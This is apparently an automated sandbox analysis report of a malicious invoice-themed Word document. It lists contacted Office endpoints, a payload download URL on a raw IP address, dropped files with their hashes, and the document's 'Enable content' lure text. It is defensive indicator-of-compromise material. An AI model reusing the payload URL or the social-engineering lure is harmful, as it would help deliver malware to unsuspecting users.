        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
          high
          https://autodiscover-s.outlook.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
            high
            https://roaming.edog.63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
              high
              https://cdn.entity.63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                    high
                    https://powerlift.acompli.net63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v163CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                      high
                      https://cortana.ai63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                high
                                https://api.aadrm.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                      high
                                      https://cr.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                          high
                                          https://graph.ppe.windows.net63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmPr3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                high
                                                https://my.microsoftpersonalcontent.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://store.office.cn/addinstemplate63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                    high
                                                    https://messaging.engagement.office.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetect63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedback63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groups63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                        high
                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                      high
                                                                                      https://messaging.lifecycle.office.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                              high
                                                                                              https://wus2.contentsync.63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://incidents.diagnostics.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                        high
                                                                                                        https://api.office.net63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                              high
                                                                                                              https://entitlement.diagnostics.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                  high
                                                                                                                  https://substrate.office.com/search/api/v2/init63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                      high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                          high
                                                                                                                          https://webshell.suite.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                              high
                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                high
                                                                                                                                https://management.azure.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.lifecycle.office.com/getcustommessage1663CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://clients.config.office.net/c2r/v1.0/InteractiveInstallation63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://graph.windows.net/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://devnull.onenote.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://messaging.action.office.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ncus.pagecontentsync.63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  45.8.146.139
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  44676VMAGE-ASRUfalse
                                                                                                                                                  Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                  Analysis ID:682568
                                                                                                                                                  Start date and time:2022-08-11 17:53:40 +02:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 28s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:wpswireless-invoice-08.11.22.doc
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • GSI enabled (VBA)
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal92.expl.winDOC@3/14@0/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 100% (good quality ratio 76.9%)
                                                                                                                                                  • Quality average: 59.8%
                                                                                                                                                  • Quality standard deviation: 39.5%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .doc
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.24, 52.109.76.34, 52.109.88.40, 20.54.89.106, 52.152.110.14
                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                  • VT rate limit hit for: wpswireless-invoice-08.11.22.doc
                                                                                                                                                  No simulations
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):148061
                                                                                                                                                  Entropy (8bit):5.358172903110677
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:9cQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:s1Q9DQe+zuXYr
                                                                                                                                                  MD5:0E298828328B8A95246773DCD6EA3410
                                                                                                                                                  SHA1:4A1D1FE30105618756B0350CDD753743DEF124A8
                                                                                                                                                  SHA-256:707D19CCBE7ED9206727C4ACC3610CC1A2585527ACA20977C207DB2DBA0F981E
                                                                                                                                                  SHA-512:58759F718479854E688F6582AC09588F8A814B77DA303E62E9ED97881E4AD54E1EDC6C2F66B5C4AE32ACFD18070927874793F21C89C3F740DD59FC72EAEBBE6F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T15:57:58">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):113730
                                                                                                                                                  Entropy (8bit):7.990292786537194
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
                                                                                                                                                  MD5:E0B30095BE35E9494E5073277D4FC1A1
                                                                                                                                                  SHA1:19D39B036989A331F5389E377FBE565436599894
                                                                                                                                                  SHA-256:EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
                                                                                                                                                  SHA-512:A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:.PNG........IHDR...|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,.*.....c...;.B...q..1.>|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.....*..oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......|.z..L.....\.FP.....QG...0.....2...@T.*....C.....M...;...i....Y8...R.Y*....~.;.CA........q....6`......~......2.g."...../..{x.( ...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):256329
                                                                                                                                                  Entropy (8bit):7.977141461672348
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:jZEgQbgyMycNcpSdpXo+T8CSmnMbYVuGFv1lzrnZYDmkhRjULY+:jAgy66pSdpXfT82MkVuGFtlHn2SQYc+
                                                                                                                                                  MD5:0E9FDA94725547962E5345A835CDCF42
                                                                                                                                                  SHA1:05B164E58205AAFD76C0715531E48962263C051D
                                                                                                                                                  SHA-256:C3EE631C65931589029588E3339FA42C142FA32852E1C2A3803ED0F50FA29B17
                                                                                                                                                  SHA-512:4E167719158FE8790C563C363082EFC0F4057DCA3A6056C16764D2037419374BECC481D0BE82CE95E4A1BA09E26801EF2C19DBC74907807DAB277D0DF55E3AA1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fUu.Qc4.t..N..~.v'.F).4Ac.1dVc.X.8fP.....R(..."RT.....A...h...M.hh...(.Pu..G.>..........<.L..v..Z{.........4....L.h.nC\.....*..1....I....X..eA...<../..J.kw.t.D-.t...m....j..|...F\...%.|.....U..|.U_...r..._.ji.m~l..>..*.x.......k.5..H...~.....0...6..2]..W..ek..{.....^i.t..f\..M.R..|..'j?@.k.jh..h .o....Z..j.*X.$=;...j...I..6.....v...R..+z2.@.'..4.|+...c2..\..d3..j:....V....k.3.=....*}.L.3.4.e.\..s.....'K..UC....Uy.....P.1Z".)WC.J.2uL.c.....=^.zzZ^.ZzE.W....t[....l.h.U.6=.V..VZ..hy)_.,Hz....-...f.`.H.,z.H^...o'x.@o.V.X.H=.L.'ZZMg.....*.Vy.\+..A[...@..].'j.....WA>u.<.e.|..K.l..qb......2.hic.:3?F_.ceZz.....3_.U..^.l..9..L.K.|.N$...q..B[...t.A.nC..+f.<0&.R>.m.*..[.P.o.2$..'Z..=Z..g..D.[.Joy.'.h..Z..U..%Z...8..A.].>.f...J..1......`..$....MT....5...c.5_..j..J.t...e..8%R..%}.*?..i...'.K$.G..#.~..T..ao...g.g.'.+?Kg.Sf.|...-o,_.r...^>im:.\..mHd>.%....j
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1536
                                                                                                                                                  Entropy (8bit):2.131668560158345
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lakwkvvlrvl/l/vlHllQvlwZZN/vlk:4LG1ND9Pxn82Ukbx5zWX
                                                                                                                                                  MD5:7FC6EC55E6092E6A473B9DA94A48668A
                                                                                                                                                  SHA1:DDF9AA1450EA5331A1F103AEFCD660E9C90A82F6
                                                                                                                                                  SHA-256:ACF013DEDAB567BA31298F31D7525E276A5F5CE569A5DC9A586CF79E16675394
                                                                                                                                                  SHA-512:5E1BBC3FD179F0C60482B56FE55F10FE475A0F259A61550367073D3EE732FC914B52AF8A13B10AD344B00D7869CA26B0D68B0398FEC036329614BD4646FE4547
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):201
                                                                                                                                                  Entropy (8bit):5.110875983732391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
                                                                                                                                                  MD5:6DFF44B8B60DD046290A5420717F052E
                                                                                                                                                  SHA1:2339B6BC052682B5CC618733AEEE776037485D3E
                                                                                                                                                  SHA-256:2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
                                                                                                                                                  SHA-512:02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):61952
                                                                                                                                                  Entropy (8bit):6.1891584557780455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
                                                                                                                                                  MD5:D7CA562B0DB4F4DD0F03A89A1FDAD63D
